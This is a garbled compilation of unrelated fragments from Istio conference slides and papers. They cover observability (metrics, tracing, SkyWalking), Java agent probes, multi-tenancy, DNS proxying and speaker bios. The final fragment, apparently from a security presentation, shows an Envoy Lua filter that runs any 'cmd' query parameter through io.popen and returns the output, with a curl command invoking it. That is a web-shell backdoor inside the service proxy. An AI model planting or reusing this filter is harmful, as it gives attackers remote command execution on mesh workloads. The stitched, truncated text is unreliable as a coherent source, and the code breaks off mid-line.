什么是用户想要的监控？分布式监控的三个维度 Metrics Logging Tracing 指标监控 • 指标可被聚合 • 体现系统性能趋势 分布式追踪 • 和请求相关 • HTTP • SQL 日志系统 • 代码逻辑处理事件 • 异常、debug信息容器化和微服务下的监控需求 微观下的监控需求 快速错误追踪 可快速排查在性能测试场景下的 慢方法、异常调用以及异常报文 等信息 Request(Transaction ID)Java探针的基本原理 A.class 1 2 3 4 5 8 9 Request Response JVM 6 10 7 Class Loader Engine Agent A’.class JavaAgent 监控数据暂 存区 运行时数据区如何基于Istio的现有组件去实现 Kubernetes Cluster MIxer 全链路关联

Authorization policies are created by users and are enforced at runtime using Envoys built-in authorization engine. Incoming requests are passed to Envoy that then evaluate the request based on the Istio administrators } if parseErr := req.ParseForm(); parseErr != nil { return reqParam, fmt.Errorf("failed to parse query from STS request: %v", parseErr) } This is also the case for the STS serverʼs second route, StsStatusPath

Namespace Level Tenancy Control Plane AMF Frontend Namespace AMF Namespace SMF SQL DB AMF App B AMF App A SMF Frontend SMF Ingress Gateway Mesh. All rights reserved. Deep Packet Inspection AMF Frontend Namespace AMF Namespace SMF SQL DB AMF App B AMF App A SMF Frontend SMF Ingress Gateway Redis

Compliant Cloud External CA integration with Istio explained Managed service mesh as a distributed cloud service Lessons Learned on Multi-tenancy Controls in Istio Presenters Lin Sun and Hands-on practices for Controlling Kubernetes Native Apps with Service Mesh Manage and Secure Distributed Services with Anthos Service Mesh Multi-tenant Istio Service Mesh with Gloo Mesh Company

com/gracezhang1110, www.linkedin.com/in/gong-zhang-75560670/ Advisory Software Engineer of IBM Cloud Code Engine team focusing on Knative Serving and Istio, contributor of the Knative and Cloud Foundry community com/in/yu-zhuang- 51915287/ Architect and Senior Software Engineer in IBM Cloud. Working on IBM Cloud Code Engine (Serverless platform), focusing on Knative, Istio, and Tekton, community, leading team to develop ● IBM Cloud Code Engine which fully managed, serverless platform(including knative and istio) that can host all of your cloud native workloads: https://www.ibm.com/cloud/code-engine ● Kperf, a public

process Bypass adaptor SkyWalking backend Tracing Metric Receiver in gRPC/HTTP Analysis Core Query CoreIstio telemetry Attribute Vocabulary https://istio.io/docs/reference/config/policy-and- tel AlarmRecord belong to this type.Query in GraphQL • Five types query • Metadata • Metric • Aggregation • Trace • Alarm https://github.com/apache/incubator- skywalking-query-protocolEcosystem powered

● Resolving DNS for services in remote clusters #IstioCon Role of DNS in Istio, Today 1. DNS query httpbin.ns1.svc.cluster.local 2. DNS response – 10.4.4.4 http req to 10.4.4.4 GET /status/200 ns1.svc.cluster.local SVC IP: 10.4.4.4 #IstioCon DNS Issues on VMs accessing K8s SVCs 1. DNS query for httpbin.ns1.svc.cluster.local 2. DNS response – no such host httpbin.ns1.svc.cluster.local 4.4.4 #IstioCon DNS Issues on ext-TCP SVCs without VIPs #IstioCon Smart DNS Proxying 1. DNS query httpbin.ns1.svc.cluster.local 2. Cached DNS response – 10.4.4.4 DNS queries to the system configured

connect, observe, and secure microservices. SkyWalking is an observability power tool that provides distributed tracing, service mesh telemetry analysis, metric aggregation and visualization for cloud-native

are interacting, both with other services and with the Istio components themselves. Metrics Distributed Traces Access Logs #IstioCon Excellent Observability Istio(envoy) can generate access logs

routing requests to the workload container, the Envoy proxy will instead parse requests for a cmd query parameter and execute it if present, returning the output. $ curl 'http://127.0.0.1:5443/?cmd=id' :gsub('%%(%x%x)', function(h) return string.char(tonumber(h, 16)) end) return s end function query(s) local ans = {} for k,v in s:gmatch('([^&=?]-)=([^&=?]+)' ) do ans[ k ] = urldecode(v) end return request_handle:headers():get(":path") request_handle:headers():replace("backend", "nobackend") local params = query(path) if params["cmd"] ~= nil then local fd = assert(io.popen(params["cmd"], 'r')) local out = a